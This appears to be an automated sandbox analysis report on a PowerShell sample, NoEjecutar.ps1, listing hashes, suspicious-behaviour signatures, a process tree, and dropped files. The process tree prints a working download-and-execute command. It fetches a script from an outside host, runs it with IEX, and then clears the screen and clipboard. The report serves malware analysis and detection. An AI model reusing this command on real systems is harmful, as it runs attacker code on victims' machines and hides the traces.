Analysis
-
max time kernel
1080s -
max time network
1799s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
20-06-2024 06:06
Static task
static1
Behavioral task
behavioral1
Sample
NoEjecutar.ps1
Resource
win7-20240508-en
General
-
Target
NoEjecutar.ps1
-
Size
771B
-
MD5
cff24ce87e9d24dead0de72ebca8b923
-
SHA1
079265dd80f631c53fe34d688f6eeb0d52f8a6ae
-
SHA256
d6b7aa881e985ed851187c9cc31f2b52f0eda6154477fdc7b7dde6c47b895aae
-
SHA512
c6c4cf566ceb3d600efc84c49b5bf449f84f9eb4fe870d71c57cc3448538fb12017f702cb3854305bbb111e394d7150fd8b41778a102bbf1b1d90e97c9109202
Malware Config
Signatures
-
pid Process 1936 powershell.exe 2644 powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2624 ipconfig.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1936 powershell.exe 1936 powershell.exe 1936 powershell.exe 2644 powershell.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1936 powershell.exe Token: SeDebugPrivilege 2644 powershell.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe Token: SeShutdownPrivilege 2872 chrome.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe 2872 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1936 wrote to memory of 2624 1936 powershell.exe 29 PID 1936 wrote to memory of 2624 1936 powershell.exe 29 PID 1936 wrote to memory of 2624 1936 powershell.exe 29 PID 1936 wrote to memory of 2644 1936 powershell.exe 30 PID 1936 wrote to memory of 2644 1936 powershell.exe 30 PID 1936 wrote to memory of 2644 1936 powershell.exe 30 PID 2872 wrote to memory of 2880 2872 chrome.exe 35 PID 2872 wrote to memory of 2880 2872 chrome.exe 35 PID 2872 wrote to memory of 2880 2872 chrome.exe 35 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1860 2872 chrome.exe 37 PID 2872 wrote to memory of 1628 2872 chrome.exe 38 PID 2872 wrote to memory of 1628 2872 chrome.exe 38 PID 2872 wrote to memory of 1628 2872 chrome.exe 38 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39 PID 2872 wrote to memory of 2708 2872 chrome.exe 39
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\NoEjecutar.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns2⤵
- Gathers network information
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $g91F = 'https://flynews.us/hell/you/goback.html' $v38K = @{ 'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' } $z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K $content = $z04Q.Content IEX $content clear-host ; Set-Clipboard -Value " ";2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6f69758,0x7fef6f69768,0x7fef6f697782⤵PID:2880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1196,i,16634031580132154435,4127922412255006321,131072 /prefetch:22⤵PID:1860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1196,i,16634031580132154435,4127922412255006321,131072 /prefetch:82⤵PID:1628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1196,i,16634031580132154435,4127922412255006321,131072 /prefetch:82⤵PID:2708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2120 --field-trial-handle=1196,i,16634031580132154435,4127922412255006321,131072 /prefetch:12⤵PID:1044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2156 --field-trial-handle=1196,i,16634031580132154435,4127922412255006321,131072 /prefetch:12⤵PID:1524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1432 --field-trial-handle=1196,i,16634031580132154435,4127922412255006321,131072 /prefetch:22⤵PID:932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1392 --field-trial-handle=1196,i,16634031580132154435,4127922412255006321,131072 /prefetch:12⤵PID:1552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3324 --field-trial-handle=1196,i,16634031580132154435,4127922412255006321,131072 /prefetch:82⤵PID:2220
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:2256
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5a7a400f3997b782592abe07e9798b6a6
SHA18499214772ff4b8ef4b925afc271c0a9d0b170cf
SHA25684a817fb1d2192f91b5bc107e49d20d8a0db04201f061271d127a5f8d5782401
SHA51282668d54eee21a4aed0778ac67a0e452a326d6bd024a7a6476a991d0e2ba1a2b8968638eaf8eabc39e741941455d2c8ca132bc9dde9d3e8b16014ace67dab142
-
Filesize
5KB
MD5c42aaf08f76b625fedf326371151dc5d
SHA1fa49e44862ac8ef72431dbd139946fdffde90c85
SHA256b3ac158d3565543d7ec7fd9a38e6977afb195d27ad43082fb085fd9cc431cbea
SHA51282e2baccddebff4afabce4759409d14ca898f7889ceeed1e7e6639e12221203f1e470aacbbed70ce0c32e224dc542b8a1078ea229a1539151c384422950259c4
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\c2e1e2b7-ba46-4246-89ac-61bbce61d305.tmp
Filesize5KB
MD52b87c3b7a3cab104f2543590d4d873da
SHA1471af51fa96d1caee9990a95acc5eebbd9bee81a
SHA256b181535837dba1931a60afca664a752961bffca237425fd12ec456558770a2a1
SHA5120279fec03d464b6b5ed5b15802e21dd495bc63d79ff28d03b653e7dbca3f0124dcd7bb99208812418b118da0407da10984e27a31a5c66cc27291542b9f9a2acd
-
Filesize
140KB
MD5617ca1b99f5a9cfc31ed9ecbafdb1251
SHA100d218a536122c63863827c79e5db0fccdfee1d9
SHA25690cad4315208bcad3c9a92146f22562db5d45e2aba42d6a2fa2dfc5ba71f95f6
SHA512ac9e3b92ecde03bb71f3144ef68a08c7e36e0674f2432a4acee9d57ae169a64ba19b3d12592ca8712f1540b4dba7d24c763b553b2e993bddef33e9d7adfe7f7e
-
Filesize
140KB
MD587496e3c5cf7b11ce39ddffadcacb0aa
SHA13ccaa0809ff720357906de216f382824428c39c3
SHA256a518f95107bb312858bc5340870a8a5ebdbb93212747872a1634a3853d48e620
SHA512bd4df5888bb77386431808e81f51231541bd9060049891fbe8c6fba4e412501390ab9289f48c391e252681fff612bdf58611e561024df05976dc3f818adb6f20
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD546a2506250dc50a312da0e6cb9c83b7e
SHA1b6ef2f094236c3807b075231aec00f98518c5727
SHA256c4fdad7315d5af8bb70f6c79dc197adaed96dcf032afd4cb79f7f0202621893c
SHA512a25949432977bf74dc3af3270b87cd20cfb2a65bfc9def62623fb2d1df1fe95b250cbc47e2466e7777a8ed3881dcef784f9a49d4f1da36d19db6759b71d43fe7